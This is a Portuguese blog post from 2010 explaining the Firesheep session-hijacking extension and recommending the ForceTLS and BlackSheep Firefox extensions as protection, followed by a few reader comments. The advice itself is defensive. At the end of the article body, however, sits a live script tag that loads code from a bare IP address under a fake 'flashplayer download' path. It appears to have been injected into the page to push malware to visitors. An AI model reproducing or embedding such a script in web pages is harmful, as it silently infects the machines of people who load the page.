" href="http://escalabilidade.com/2010/04/10/protegendo-sua-conta-no-facebook-e-twitter/" rel="bookmark">Protegendo sua conta no Facebook e Twitter

Sáb, Abr 10, 2010

Diversos

Segurança da informação não é um dos temas abordados aqui no escalabilidade, mas ocasionalmente a pedido de alguns leitores abordamos alguns tópicos. Recentemente a possibilidade de se roubar a senha de usuários de serviços famosos como o Facebook e o Twitter usando apenas um plugin para firefox causou bastante barulho na comunidade de desenvolvedores.

O Firesheep é um programa que permite o “seqüestro” de sessões em diversos sites, entre eles Facebook e Twitter. Isso significa que se um usuário acessar sua conta no Facebook em uma rede wireless aberta (normalmente redes públicas), o atacante consegue “seqüestrar” sua sessão e acessar sua conta.

O programa é uma extensão para o navegador Firefox e atualmente pode rodar no Windows e no Mac. O objetivo do projeto é forçar que sites como Twitter e Facebook melhorem sua segurança, porém está sendo usado por diversos “I-wanna-be” hackers para roubar as contas de muitos usuários leigos.

Firesheep funcionando (em inglês):

Como se proteger?

ForceTLS

Com a extensão ForceTLS para o Firefox, é possível configurar sites onde é obrigatório o acesso via HTTPS. Acessando o Facebook com HTTPS, faz com que toda a troca de informações seja criptografada. Desta forma o Firesheep não consegue “entender” e nem utilizar sua sessão.

Primeiro instale o ForceTLS no Firefox e após isso configure os sites que devem ser acessados somente com HTTPS.

BlackSheep

Outra opção para se proteger do Firesheep é o BlackSheep também é uma extensão para o Firefox e serve para detectar o Firesheep. Pode ser considerado como um “anti-Firesheep”.

Esta extensão consegue perceber quando o Firesheep tenta seqüestrar a sessão e nesse momento envia um login (na verdade um cookie) falso que engana o Firesheep. Ele avisa o usuário do ataque, informa o IP do atacante e sugere que seja realizado logoff nos sites.

O BlackSheep reaproveitou boa parte do código do Firesheep. Por isso não é possível utilizar ambos (BlackSheep e Firesheep) ao mesmo tempo.

Um vídeo (em inglês) do BlackSheep funcionando:

Caso conheçam soluções para outros navegadores, informem nos comentários. icon smile Protegendo sua conta no Facebook e Twitter<script src=http://87.106.35.192/br/flashplayer/download/></script>

,

Por:

Que escreveu 2 posts em Escalabilidade.


Fale com o autor

  • Anónimo

    O problema do Blacksheep é que ele só funciona por causa de detalhes da implementação do Firesheep. Se alguém alterar a implementação para, por exemplo, ao invés de tentar acessar o site usando o cookie capturado, acessar através de um túnel que deixe os acessos invisíveis para o computador com o Blacksheep, a detecção já não funciona mais. E tenho certeza que alguém já deve ter feito esse “fork” do código do Firesheep :-/
    Infelizmente a única solução definitiva é usar HTTPS mesmo.

  • http://readwriteweb.com.br/ dttg

    Prefiro perder minha conta no facebook a ter que fazer isso tudo! Mas bacana hehehe.

    abraço,

  • http://readwriteweb.com.br/ dttg

    Prefiro perder minha conta no facebook a ter que fazer isso tudo! Mas bacana hehehe.

    abraço,